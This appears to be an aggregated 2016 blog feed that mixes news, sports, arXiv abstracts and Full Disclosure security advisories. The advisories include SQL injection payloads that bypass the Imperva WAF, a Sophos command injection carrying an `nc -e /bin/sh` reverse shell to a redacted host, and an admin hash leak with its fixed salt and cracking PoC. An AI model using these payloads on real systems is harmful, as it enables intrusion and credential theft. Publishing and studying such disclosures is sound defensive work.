Saturday, November 5, 2016

UK police arrest nearly 50 at Anonymous protest in London

LONDON (Reuters) – British police said they arrested 47 people on Saturday at an anti-capitalism demonstration in central London organized by the ...

from Google Alert - anonymous http://ift.tt/2fPvrO0
via IFTTT

More Insights On Alleged DDoS Attack Against Liberia Using Mirai Botnet

On Thursday, we compiled a story based on research published by a British security expert reporting that some cyber criminals are apparently using the Mirai botnet to conduct DDoS attacks against telecommunication companies in Liberia, a small African country. In his blog post, Kevin Beaumont claimed that a Liberian transit provider confirmed to him a DDoS attack of more than 500 Gbps


from The Hacker News http://ift.tt/2fc0TlT
via IFTTT

I have a new follower on Twitter


Tom Greathouse
It Solutions for a better world! #Retail #SmartLabels #RFID #StoreOperations Husband, Dad, #StarWarsGeek, Lightsaber duelist, IT Pro, Passion for Cybersecurity
Buffalo, NY
https://t.co/3iIkukZigX
Following: 703 - Followers: 174

November 05, 2016 at 01:25PM via Twitter http://twitter.com/tgr8house1

Ravens elevate S Matt Elam to 53-man roster; previously designated to return off injured reserve (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

> Actually, it does parse correctly. Go read RFC 1738. IIRC, RFC 3986 "fixes" that, and so does http://ift.tt/ZzeYBu. /mz

Source: Gmail -> IFTTT-> Blogger

Over 1 Billion Android App Accounts can be Hijacked Remotely with this Simple Hack

Security researchers have discovered a way to target a huge number of Android apps that could allow them to remotely sign into any victim's mobile app account without any knowledge of the victim. A group of three researchers – Ronghai Yang, Wing Cheong Lau, and Tianyu Liu – from the Chinese University of Hong Kong has found that most of the popular Android apps that support single sign-on (


from The Hacker News http://ift.tt/2eatYkG
via IFTTT

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote:
> I can't find any bugtracker in lynx ,so i will disclose by this mail and
> sent to the author dickey@invisible-island.net.
>
> redrain (rootredrain@gmail.com)
> Date:2016-11-03
> Version: 2.8.8pre.4、2.8.9dev.8 and earlier
> Platform: Linux and Windows
> Vendor: http://ift.tt/tQALNj
> Vendor Notified: 2016-11-03
>
>
> VULNERABILITY
>

Source: Gmail -> IFTTT-> Blogger

[FD] Bypass Imperva by confusing HTTP Pollution Normalization Engine

#################################################
Bypass Imperva by confusing HTTP Pollution Normalization Engine
#################################################

Author: Wiswat Aswamenakul
Environment: Tested with Imperva Version: 11.5 and Web Backend as IIS + ASP

Description:

One of the techniques that attackers use to bypass a web application firewall is the HTTP pollution attack. The attack can be produced by sending parameters with the same name to the web application, and the result on the web application will depend on which web server and language are used on the server. IIS and ASP will combine all the values together, separating each one with "," (comma). For example,

http://ift.tt/2f3s1py

The page sqli.asp will see the "a" parameter as "first,second" (without double quotes). Therefore, attackers could craft an attack string as follows:

http://ift.tt/2foJxTJ'/*&a=*/or/*&a=*/1=1/*&a=*/--+-

The page sqli.asp will see the "a" parameter as "'/*,*/or/*,*/1=1/*,*/--+-" (without double quotes). Some web application firewalls will fail to detect this attack. However, Imperva handles this type of attack by combining all the parameters with the same name like IIS+ASP does (I call it the normalization engine) before passing the end result to the detection engine.

However, I have found that there is a trick, bug, vulnerability, feature, (you name it) that allows the normalization engine to create end results different from what IIS+ASP does.

[+] Attack that can be detected by Imperva
http://ift.tt/2foJxTJ'/*&a=*/or/*&a=*/1=1/*&a=*/--+-

[+] Attack that can bypass Imperva
http://ift.tt/2foJxTJ'/*&a%00=*/or/*&a=*/1=1/*&a%00=*/--+-

*Please notice the %00 in the parameter name

Imperva treats a and a%00 as different parameters. As a result, when combining the parameters with the same name, it will not see a valid attack string. On the other hand, IIS+ASP sees a and a%00 as the same parameter. Apache and PHP also see a and a%00 as the same parameter. Other combinations have not been tested yet.

PS. Other web application firewalls might be tricked by this technique to bypass their detection but I don't have devices for testing.

Source: Gmail -> IFTTT-> Blogger
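The normalization mismatch described in the post above, shown as an added example (not code from the original post or from any vendor): one view keeps `a` and `a%00` apart, the other folds them together and joins values with a comma as the post says IIS+ASP does. The function names, the finding labels and the sample query (benign values arranged in the post's pattern) are constructed for illustration.

```python
from urllib.parse import unquote_to_bytes


def parse_pairs(raw_query):
    """Split a raw query string into percent-decoded (name, value) byte pairs."""
    pairs = []
    for field in raw_query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        # '+' is deliberately left undecoded so values read as they do in the post.
        pairs.append((unquote_to_bytes(name), unquote_to_bytes(value)))
    return pairs


def combine(pairs, canonical_name):
    """Group values by canonical parameter name and join them with ','."""
    grouped = {}
    for name, value in pairs:
        grouped.setdefault(canonical_name(name), []).append(value)
    return {name: b",".join(values) for name, values in grouped.items()}


def inspection_view(raw_query):
    """Names compared byte for byte: 'a' and 'a\\x00' remain two parameters."""
    return combine(parse_pairs(raw_query), lambda name: name)


def backend_view(raw_query):
    """Names cut at the first NUL byte, modelling the backend behaviour the
    post reports (a and a%00 treated as the same parameter)."""
    return combine(parse_pairs(raw_query), lambda name: name.split(b"\x00", 1)[0])


def audit(raw_query):
    """Return finding labels for a request whose inspection and backend views
    can diverge. Labels are hypothetical names chosen for this example."""
    findings = []
    names = {name for name, _ in parse_pairs(raw_query)}
    if any(byte < 0x20 or byte == 0x7F for name in names for byte in name):
        findings.append("name-control-byte")
    if inspection_view(raw_query) != backend_view(raw_query):
        findings.append("view-mismatch")
    return findings


# Constructed sample: benign values in the same a / a%00 / a / a%00 layout.
SAMPLE_QUERY = "a=first&a%00=second&a=third&a%00=fourth"

if __name__ == "__main__":
    print("inspection:", inspection_view(SAMPLE_QUERY))
    print("backend:   ", backend_view(SAMPLE_QUERY))
    print("findings:  ", audit(SAMPLE_QUERY))
```

Rejecting or canonicalizing names that carry control bytes before signature matching removes the gap between the two views.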

[FD] MySQL / MariaDB / PerconaDB - Root Privilege Escalation Exploit ( CVE-2016-6664 / CVE-2016-5617 )

CVE-2016-6664 / (Oracle)CVE-2016-5617

Vulnerability: MySQL / MariaDB / PerconaDB - Root Privilege Escalation
Discovered by: Dawid Golunski @dawid_golunski http://ift.tt/2fcYckq

MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to mysql system user (for example through CVE-2016-6663) to further escalate their privileges to root user allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files.

Affected versions:

MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14

MariaDB
All current

Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8

Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0

The full up-to-date advisory and a PoC exploit can be found at:
http://ift.tt/2eZRrlA

PoC Video showing the exploitation gaining rootshell:
http://ift.tt/2faWtMH

attacker will need to obtain mysql account first which could be gained with the other exploit (CVE-2016-6663) I discovered:
http://ift.tt/2dZWnda

More updates on the feed:
https://twitter.com/dawid_golunski

Source: Gmail -> IFTTT-> Blogger

[FD] MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the third entry in that series.

The below information is also available on my blog at http://ift.tt/2exA1i7. There you can find a repro that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read
==============================================================

Synopsis

Source: Gmail -> IFTTT-> Blogger

Friday, November 4, 2016

Zayn Malik wants to know what it feels like to be anonymous

During a recent interview with the UK's Evening Standard, the singer revealed that he yearns to know what it feels like to be anonymous. He told the ...

from Google Alert - anonymous http://ift.tt/2fMMLmO
via IFTTT

Ravens claim former Bengals CB Chris Lewis-Harris off of waivers and cut CB Will Davis (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Rank K.O. Lab
Growth Hacking and Skunkworks Project for @rankkousa, the leader in Reputation Management. Our mission is to radically innovate the Enterprise ORM Industry.
USA
http://t.co/AijmU3WyFZ
Following: 6601 - Followers: 6910

November 04, 2016 at 06:55PM via Twitter http://twitter.com/rankkolab

Anonymous Pastor in Central Asia Describes Exactly What Christian Persecution Looks Like

A pastor from Central Asia boldly spoke to Faithwire this week, describing some of the dire and heartbreaking scenarios facing Christians […]

from Google Alert - anonymous http://ift.tt/2fkqdGM
via IFTTT

Anonymous scout blasts Revis

While an anonymous scout may have gone over the top when blasting Darrelle Revis for a lack of effort, the Jets should have legitimate concerns ...

from Google Alert - anonymous http://ift.tt/2eHEa0h
via IFTTT

An Anonymous Group Is Sending Out Mailers Touting Libertarian Candidates In 2 Key State House ...

Republicans believe that Democrats are the ones responsible for the anonymous mailers. In a year where third-party candidates are doing better than ...

from Google Alert - anonymous http://ift.tt/2e9pz1n
via IFTTT

Ravens: WR Steve Smith (ankle), LB Terrell Suggs (bicep) questionable for Week 9; both practiced in full Friday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Privatoria — Protect Your Privacy Online with Fast and Encrypted VPN Service

Today, most of you surf the web unaware of the fact that websites collect your data, track your locations and make millions by sharing your search histories, location data, and buying habits with advertisers and marketers. And if this isn't enough, there are hackers and cyber criminals out there who have the ability to easily steal your sensitive and personal data from the ill-equipped


from The Hacker News http://ift.tt/2fjR3yK
via IFTTT

[FD] KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: http://ift.tt/2f1FvCa

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Appliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification
Impact: Remote Code Execution
Attack vector: HTTP

2. Vulnerability Description

An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user.

3. Technical Description

Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as:

POST /index.php?c=logs HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 305
Connection: close

STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1

HTTP/1.1 200 OK
Date: Tue, 10 May 2016 15:35:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 207

{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-008 : Sophos Web Appliance Privilege Escalation

KL-001-2016-008 : Sophos Web Appliance Privilege Escalation

Title: Sophos Web Appliance Privilege Escalation
Advisory ID: KL-001-2016-008
Publication Date: 2016.11.03
Publication URL: http://ift.tt/2f1NIGv

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Appliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords
Impact: Privilege Escalation
Attack vector: HTTP

2. Vulnerability Description

An unprivileged user can obtain an MD5 hash of the administrator password which can then be used to discover the plain-text password.

3. Technical Description

A user with the privileges: Helpdesk, Policy, Reporting, or User Activity can obtain an MD5 hash for the Full Access Administrator account. A valid session identifier is required and is delivered through the STYLE parameter.

GET /index.php?c=change_password&STYLE=7151e50b0389755717510f218b1af00c HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close

HTTP/1.1 200 OK
Date: Tue, 10 May 2016 00:36:43 GMT
Server: Apache
X-UA-Compatible: IE=7
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8798

...
{"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\n Cancel<\/span>\n<\/a>","\n Save<\/span>\n<\/a>"],"navigation_left":[],"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid","uiStatusMessages":{"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid"},"rba":{"reports":true,"search":true,"configuration":true,"system_status":false,"help_support":true,"editable":true,"current_user":"test","globalUser":false,"admin_role":false}
...

A fixed salt is apparently used for all such devices:

P3T3R p@rk3r

The admin MD5 hash in this case is:

f98d0973dffdc3a29ee67167c15b882e

4. Mitigation and Remediation Recommendation

The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at:

http://ift.tt/2foXkIo

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
2016.09.28 - KoreLogic requests status update.
2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October.
2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week.
2016.11.03 - Public disclosure.

7. Proof of Concept

>>> from hashlib import md5
>>> md5('P3T3R p@rk3radmin123').hexdigest()
'f98d0973dffdc3a29ee67167c15b882e'

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r

Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger
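A regression check for the exposure described in the advisory above, given as an added example (not KoreLogic's or Sophos's code): it walks a JSON response captured as a low-privileged user and reports credential fields, including ones hidden inside a JSON-encoded string such as `usersJS`. The key list, function names and sample bodies are assumptions constructed for illustration; the digests are placeholders.

```python
import json
import re

# Assumption: field names treated as credential material in this example.
SENSITIVE_KEYS = {"password", "passwd", "pass", "hash", "secret"}

# Hex strings with the length of an MD5, SHA-1 or SHA-256 digest.
HEX_DIGEST = re.compile(r"^(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})$")


def find_exposed_credentials(value, path="$"):
    """Return (path, kind) for every non-empty credential field under value.

    Strings that themselves hold a JSON document are decoded and searched as
    well, because the response in the advisory nests the user list that way.
    """
    findings = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = "%s.%s" % (path, key)
            if key.lower() in SENSITIVE_KEYS and isinstance(child, str) and child:
                kind = "digest" if HEX_DIGEST.match(child) else "value"
                findings.append((child_path, kind))
            else:
                findings.extend(find_exposed_credentials(child, child_path))
    elif isinstance(value, list):
        for index, child in enumerate(value):
            findings.extend(
                find_exposed_credentials(child, "%s[%d]" % (path, index)))
    elif isinstance(value, str) and value.strip().startswith(("[", "{")):
        try:
            nested = json.loads(value)
        except ValueError:
            return findings  # looked like JSON but is ordinary text
        findings.extend(find_exposed_credentials(nested, path + "<json>"))
    return findings


def audit_response(body):
    """Parse a response body and list the credential fields it discloses."""
    return find_exposed_credentials(json.loads(body))


# Constructed sample shaped like the advisory's response; placeholder digests.
SAMPLE_BODY = json.dumps({
    "currentUser": "test",
    "usersJS": json.dumps([
        {"username": "admin", "password": "0" * 32,
         "roles": "Full Access Administrator"},
        {"username": "test", "password": "1" * 32, "roles": ["helpdesk"]},
    ]),
    "status_invalid_password": "Invalid password",
})

# Constructed sample with only UI strings, which must not be reported.
CLEAN_BODY = json.dumps({
    "currentUser": "test",
    "status_invalid_password": "Invalid password",
})

if __name__ == "__main__":
    for finding in audit_response(SAMPLE_BODY):
        print(finding)
```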

Learn Python Online — From Scratch to Penetration Testing

When we started our brand new THN Deals Store last week on the special occasion of company's 6th Anniversary, we introduced its very first product, Professional Hacking Certification Package, and received great response from our readers. Thank you! If you have not yet, you can still get this deal — Computer Hacker Professional Certification Package — at 96% discount. This Package offers you


from The Hacker News http://ift.tt/2fjskuz
via IFTTT

ISS Daily Summary Report – 11/03/2016

Orbital ATK (OA)-5 Cargo Operations: Today, CDR continued transferring cargo from Cygnus to ISS. Afterwards, CDR participated in a cargo conference with ground specialists. At last report approximately 9.5 hours of cargo operations had been completed and an estimated 16 hours of operations remaining.

Human Research Program (HRP) Collections: CDR began 24-hour urine collections this morning in support of the Biochemical Profile and Repository experiments. Collected samples are placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return at a later date. This afternoon, CDR setup for tomorrow’s blood collections. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. Repository is a storage bank used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions.

Compound Specific Analyzer-Combustion (CSA-CP) Checkout: The CDR changed out the batteries in two newly resupplied CSA-CP units and update internal clock settings. The CSA-CP units will sit deactivated with new batteries for at least 24-hours for sensors to re-establish bias voltages, and for 10-12 days in an open environment for sensor off-gassing.

Premature Combustion Integration Rack (CIR) Ignitor Burnout: Following seven successful FLame Extinguishment-2 (FLEX-2) test points, ground teams observed the CIR Ignitor #2 had burned out during the radiometer calibration. Yesterday’s test points was the third day using the ignitors, with two additional days scheduled prior to the planned ignitor replacement. Ground teams will activate the rack today and bring down the images from yesterday’s test. A forward plan for ignitor replacement and future CIR operations is in development.

Today’s Planned Activities
All activities were completed unless otherwise noted.

Regeneration of Micropurification Unit (БМП) Ф2 Cartridge (start) ALGOMETRIYA. Pressure and Thermal Algometry preparation for and measurement session Veggie fan speed change HRF Generic Urine Collection Setup First Time SM Ventilation Subsystem Preventive Maintenance. Group А MORNING PREPARATION WORK Food Frequency Questionnaire (FFQ) or ISS Food Intake Tracker (ISS FIT) Combustion Integrated Rack Alignment Guide Installation P/TV CEVIS Video Setup Preparation for ИП-1 Flow Indicator R&R. Measuring CO partial pressure at Central Post using CSA-CP analyzer (Located on SM Central Post panel 208). Battery replacement (as necessary) Report to MCC measurement data and analyzer number Soyuz 732 Samsung Tablet Recharge, Initiate 24-hour ECG Recording (termination) CEVIS Exercise Video Stow 24-hour BP recording (terminate) Crew time for ISS adaptation and orientation Preparation for Nitrogen Purge Unit (БПА-M) R&R in Elektron-VM Oxygen Generation Unit [СКО]. СОЖ maintenance Transfer Cygnus Cargo Operations Soyuz 732 Samsung Tablet Recharge, Terminate Cygnus Cargo Operations Conference ALGOMETRIYA. Pressure Algometry Measurement Ops 24-hour ECG Recording (start) Soyuz 732 Transfers and IMS Ops HRF Generic Frozen Blood Collection Setup Download of BRI log from RSS1 Crew time for ISS adaptation and orientation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill PAO Preparation Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Public Affairs Office (PAO) Event in High Definition (HD) – Lab Compound Specific Analyzer-Combustion (CSA-CP) Checkout INTERACTION-2. Experiment. Inventory Management System (IMS) Conference CB/ISS CREW CONFERENCE ISS Crew Orientation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Flight Director/ISS CREW CONFERENCE Regeneration of БМП Ф2 Absorption Cartridge (end) ALGOMETRIYA. Pressure and Thermal Algometry Measurement Session. Closeout Ops

Completed Task List Items
On-board Training (OBT) Cygnus Attached Phase Operations review Tropical Cyclone Operations Review Connects and powers on the WORF Laptop.

Ground Activities
All activities were completed unless otherwise noted.
Channel 4B Battery Capacity Test P4 IEA Survey

Three-Day Look Ahead:
Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer
Saturday, 11/06: Weekly Housekeeping
Sunday, 11/07: Crew Off Duty

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Operate
Major Constituent Analyzer (MCA) Node 3: Idle
Oxygen Generation Assembly (OGA): Shutdown
Urine Processing Assembly (UPA): Process
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2euU6W5
via IFTTT

[FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

I can't find any bugtracker in lynx ,so i will disclose by this mail and sent to the author dickey@invisible-island.net.

redrain (rootredrain@gmail.com)
Date:2016-11-03
Version: 2.8.8pre.4、2.8.9dev.8 and earlier
Platform: Linux and Windows
Vendor: http://ift.tt/tQALNj
Vendor Notified: 2016-11-03

VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote:
> I can't find any bugtracker in lynx ,so i will disclose by this mail and
> sent to the author dickey@invisible-island.net.
>
> redrain (rootredrain@gmail.com)
> Date:2016-11-03
> Version: 2.8.8pre.4、2.8.9dev.8 and earlier

FYI, as far as I can tell, this bug is present in 2.8.9dev.9 as well.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote:
> I can't find any bugtracker in lynx ,so i will disclose by this mail and
> sent to the author dickey@invisible-island.net.

thanks (I'll put together a fix)

Source: Gmail -> IFTTT-> Blogger

[FD] MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the third entry in that series.

The below information is also available on my blog at http://ift.tt/2fByXfl. There you can find a repro that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read
===============================================================

(The fix and CVE number for this bug are not known)

Synopsis

Source: Gmail -> IFTTT-> Blogger

Wi-Fi can be turned into IMSI Catcher to Track Cell Phone Users Everywhere

Here's a new danger to your smartphone security: Your mobile device can be hijacked and tracked without your knowledge. Remember Stingrays? The controversial cell phone spying tool, also known as "IMSI catchers," has long been used by law enforcement to track and monitor mobile users by mimicking a cellphone tower and tricking their devices to connect to them. Sometimes it even intercepts


from The Hacker News http://ift.tt/2e7MTwC
via IFTTT

Thursday, November 3, 2016

Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. (arXiv:1611.00791v1 [cs.CR])

Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generating a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate---a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results.



from cs.AI updates on arXiv.org http://ift.tt/2f6AoOJ
via IFTTT

Quantile Reinforcement Learning. (arXiv:1611.00862v1 [cs.LG])

In reinforcement learning, the standard criterion to evaluate policies in a state is the expectation of (discounted) sum of rewards. However, this criterion may not always be suitable; we consider an alternative criterion based on the notion of quantiles. In the case of episodic reinforcement learning problems, we propose an algorithm based on stochastic approximation with two timescales. We evaluate our proposition on a simple model of the TV show, Who wants to be a millionaire.



from cs.AI updates on arXiv.org http://ift.tt/2fhzt0F
via IFTTT

Extracting Actionability from Machine Learning Models by Sub-optimal Deterministic Planning. (arXiv:1611.00873v1 [cs.AI])

A main focus of machine learning research has been improving the generalization accuracy and efficiency of prediction models. Many models such as SVM, random forest, and deep neural nets have been proposed and achieved great success. However, what emerges as missing in many applications is actionability, i.e., the ability to turn prediction results into actions. For example, in applications such as customer relationship management, clinical prediction, and advertisement, the users need not only accurate prediction, but also actionable instructions which can transfer an input to a desirable goal (e.g., higher profit repays, lower morbidity rates, higher ads hit rates). Existing efforts to derive such actionable knowledge are few and limited to simple action models which are restricted to changing only one attribute for each action. The dilemma is that in many real applications those action models are often more complex and harder to extract an optimal solution.

In this paper, we propose a novel approach that achieves actionability by combining learning with planning, two core areas of AI. In particular, we propose a framework to extract actionable knowledge from random forest, one of the most widely used and best off-the-shelf classifiers. We formulate the actionability problem to a sub-optimal action planning (SOAP) problem, which is to find a plan to alter certain features of a given input so that the random forest would yield a desirable output, while minimizing the total costs of actions. Technically, the SOAP problem is formulated in the SAS+ planning formalism, and solved using a Max-SAT based approach. Our experimental results demonstrate the effectiveness and efficiency of the proposed approach on a personal credit dataset and other benchmarks. Our work represents a new application of automated planning on an emerging and challenging machine learning paradigm.



from cs.AI updates on arXiv.org http://ift.tt/2f6AA0u
via IFTTT

Maximizing Investment Value of Small-Scale PV in a Smart Grid Environment. (arXiv:1611.00890v1 [math.OC])

Determining the optimal size and orientation of small-scale residential based PV arrays will become increasingly complex in the future smart grid environment with the introduction of smart meters and dynamic tariffs. However consumers can leverage the availability of smart meter data to conduct a more detailed exploration of PV investment options for their particular circumstances. In this paper, an optimization method for PV orientation and sizing is proposed whereby maximizing the PV investment value is set as the defining objective. Solar insolation and PV array models are described to form the basis of the PV array optimization strategy. A constrained particle swarm optimization algorithm is selected due to its strong performance in non-linear applications. The optimization algorithm is applied to real-world metered data to quantify the possible investment value of a PV installation under different energy retailers and tariff structures. The arrangement with the highest value is determined to enable prospective small-scale PV investors to select the most cost-effective system.



from cs.AI updates on arXiv.org http://ift.tt/2fhEYfZ
via IFTTT

Probabilistic Modeling of Progressive Filtering. (arXiv:1611.01080v1 [cs.AI])

Progressive filtering is a simple way to perform hierarchical classification, inspired by the behavior that most humans put into practice while attempting to categorize an item according to an underlying taxonomy. Each node of the taxonomy being associated with a different category, one may visualize the categorization process by looking at the item going downwards through all the nodes that accept it as belonging to the corresponding category. This paper is aimed at modeling the progressive filtering technique from a probabilistic perspective, in a hierarchical text categorization setting. As a result, the designer of a system based on progressive filtering should be facilitated in the task of devising, training, and testing it.



from cs.AI updates on arXiv.org http://ift.tt/2f6Aeag
via IFTTT

Long-term causal effects via behavioral game theory. (arXiv:1501.02315v7 [stat.ME] UPDATED)

